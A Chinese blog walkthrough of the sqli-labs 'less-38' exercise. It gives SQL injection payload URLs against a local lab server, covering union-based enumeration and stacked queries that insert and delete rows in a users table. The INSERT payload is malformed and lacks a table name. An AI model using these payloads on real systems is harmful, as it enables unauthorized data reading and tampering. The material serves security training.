sql_lab之sqli中的堆叠型注入(less-38)
2023-12-23 10:35:29
堆叠注入(less-38)
1.判断注入类型
http://127.0.0.3/less-38/?id=1' and 1=2 -- s?没有回显
http://127.0.0.3/less-38/?id=1' and 1=1?-- s?有回显
则说明是单字节’注入
2.查询字段数
http://127.0.0.3/less-38/?id=1' order by 4 -- s?报错
http://127.0.0.3/less-38/?id=1' order by 3?-- s?有回显
说明字段数为3
3.判断回显点
http://127.0.0.3/less-38/?id=-1' union select 1,2,3 -- s
4.查询数据库
http://127.0.0.3/less-38/?id=-1' union select 1,database(),3 -- s
接下来的步骤可以用联合查询进行查询
堆叠注入攻击
(1)在users表中添加一个用户
http://127.0.0.3/less-38/?id=1'; insert ?into values(17,'gao','a123456') -- s
证明添加成功
(2)在users表中删除一个用户
http://127.0.0.3/less-38/?id=1';delete from users where users.username='gao' ??-- s
表中没有gao这个用户,说明删除成功
文章来源:https://blog.csdn.net/qq_59020256/article/details/135164934
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!